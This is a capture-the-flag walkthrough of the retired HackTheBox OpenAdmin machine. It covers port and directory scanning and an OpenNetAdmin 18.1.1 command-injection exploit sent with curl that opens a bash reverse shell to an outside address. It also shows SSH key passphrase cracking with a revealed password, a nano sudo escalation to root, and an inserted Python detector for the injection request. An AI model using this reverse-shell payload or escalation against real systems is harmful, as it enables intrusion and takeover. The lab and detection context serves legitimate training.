OpenAdmin(Linux-based) Machine Walkthrough HTB

Overview

Hello Awesome Hackers, nice to meet you all. This blog will focus on a retired box on HackTheBox.

Machine - IP: 10.10.10.171

Recon

```
NSE: Loaded 125 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:31
Completed NSE at 21:31, 0.00s elapsed
Initiating NSE at 21:31
Completed NSE at 21:31, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:31
Completed Parallel DNS resolution of 1 host. at 21:31, 0.00s elapsed
Initiating Connect Scan at 21:31
Scanning 10.10.10.171 [1000 ports]
Discovered open port 22/tcp on 10.10.10.171
Discovered open port 80/tcp on 10.10.10.171
Increasing send delay for 10.10.10.171 from 0 to 5 due to max_successful_tryno increase to 4
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 69.70% done; ETC: 21:32 (0:00:15 remaining)
Completed Connect Scan at 21:32, 52.39s elapsed (1000 total ports)
NSE: Script scanning 10.10.10.171.
Initiating NSE at 21:32
Completed NSE at 21:32, 15.85s elapsed
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Nmap scan report for 10.10.10.171
Host is up (0.63s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Ubuntu Default Page: It works

NSE: Script Post-scanning.
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 68.46 seconds
```

Open Ports

-> Port 22 - SSH
-> Port 80 - HTTP

Now I open this IP address in the browser; it shows the Apache2 default page.

Directory Brute Force

```
gobuster dir -u http://10.10.10.171 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x php,txt,html -o gobuster-root-php_txt_html

/music (Status: 301)
/artwork (Status: 301)
/sierra (Status: 301)
```

Coming to the login page, we got the "OpenNetAdmin" version; let's recon the "ona".

http://10.10.10.171/ona

Now I see that the version is v18.1.1, which it warns is not the latest.

Now I am trying to find the exploit by using searchsploit.

Run the netcat command:

```
nc -nvlp 443
```

Now I am trying to get the shell by using this curl command:

```
curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.16.7/443 0>%261'&xajaxargs[]=ping" http://10.10.10.171/ona/
```

I get the shell.
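
A detection-side view of the request above, as an added example that is not part of the original walkthrough: it decodes the form body and lists the reasons a WAF rule or log pipeline should reject it. The function names, the benign sample request, and the assumption that the `ip=>` argument should hold only an address are mine, not OpenNetAdmin's.

```python
import ipaddress
import re
from urllib.parse import parse_qsl

# Request body taken from the curl command in this walkthrough.
PAGE_BODY = (
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    "&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.16.7/443 0>%261'"
    "&xajaxargs[]=ping"
)
# Constructed benign request (assumed shape: ip=> followed by one address).
BENIGN_BODY = (
    "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
    "&xajaxargs[]=ip%3D%3E10.10.10.171&xajaxargs[]=ping"
)

# Constructs that should never appear in an argument of this request.
SUSPICIOUS = {
    "shell metacharacter": re.compile(r"[;|&`]|\$\("),
    "bash network redirection": re.compile(r"/dev/(?:tcp|udp)/"),
    "shell invocation": re.compile(r"\b(?:ba|da|z)?sh\s+-[ci]\b"),
}

def xajax_args(body: str) -> list[str]:
    """Decode a form-encoded body and return its xajaxargs[] values in order."""
    # Split on '&' only: the injected ';' must stay inside the value.
    pairs = parse_qsl(body, keep_blank_values=True, separator="&")
    return [value for key, value in pairs if key == "xajaxargs[]"]

def is_plain_ip_argument(value: str) -> bool:
    """Allow-list check: exactly 'ip=>' followed by one valid IP address."""
    prefix, sep, addr = value.partition("=>")
    if prefix != "ip" or not sep:
        return False
    try:
        ipaddress.ip_address(addr)
    except ValueError:
        return False
    return True

def injection_reasons(body: str) -> list[str]:
    """Return the reasons a request body looks like command injection."""
    reasons = []
    for value in xajax_args(body):
        reasons += [name for name, rx in SUSPICIOUS.items() if rx.search(value)]
        if value.startswith("ip=>") and not is_plain_ip_argument(value):
            reasons.append("ip argument is not a bare address")
    return reasons
```

The allow-list check is the stronger control: the pattern list only explains why a request was flagged, while `is_plain_ip_argument` rejects anything that is not a single address.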

Privilege Escalation

Now my task is to go from www-data to jimmy. I started the enumeration and checked everything like config files, PHP files, etc. I got some juicy data.

So here we got some credentials for the database.

Now let's check how many users are present in the home directory of this machine. Here we find that there are two users present on the machine: "Jimmy" and "Joanna".

Let's try to connect through the SSH port as the user jimmy with the above password, which we found in the database_settings.inc.php file. I successfully logged in.

Now I found an interesting directory inside /var/www/: /internal.

The PHP must be hosted using a web server and a particular port MUST be used.

Now I copied the private key back to my box. I used ssh2john, which converts the key into a format that John the Ripper can understand, and cracked the passphrase.

```
ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

Once the password is cracked, here is the password:

joanna:bloodninjas

Now I set the permissions on id_rsa:

```
chmod 600 id_rsa
```

Now I try to log in using the SSH port:

```
ssh -i id_rsa joanna@10.10.10.171
```

Enter the passphrase and hit Enter. We are successfully logged in. Now we use this command:

```
sudo -l
```

gtfobins

When inside nano, press Ctrl+r followed by Ctrl+x. Nano will prompt you for the command you want to execute. The command essentially opens a shell on the box as root.

We get the shell. Here are the flags:
user.txt
32charactershashedflag
root.txt
32charactershashedflag

Thank you for Reading

HAPPY HACKING!!!

Twitter: https://twitter.com/nagasaikiran010

Linkedin: https://www.linkedin.com/in/nagasaikiran010/